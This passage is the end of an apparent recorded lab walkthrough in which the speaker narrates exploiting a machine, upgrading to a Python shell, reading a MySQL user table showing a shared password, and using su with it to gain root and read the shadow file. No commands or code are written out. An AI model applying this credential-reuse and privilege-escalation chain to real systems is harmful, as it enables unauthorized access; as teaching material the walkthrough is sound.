the exact same arguments, and then I launched with the run command. I screwed it up a couple of times. Once I had my parameters set, I launched it with the run command. And once I had it running, I then launched a shell, and then I gave myself a better shell to use, specifically the Python interpreter. It gives you a better interpreter because then you can log into the database, log into MySQL, log into the Dynamy database, take a look at the content of the user table, and see that everybody has the same password. Assuming that this is a single admin doing all of this work, I then, at the very bottom, after all of my other screw-ups, said, okay, let's just assume that this person is there's just one account, and Everything is done through this one account. So let's try the SU command and see if this person is so lazy that they use the same root password for the SU command. And when we tried it, it actually worked. When I say, who am I? It says that I am root. And the sanity check is if I could look at the shadow file, I am actually logged in as root. Any questions? Okay, I'm going to stop this recording.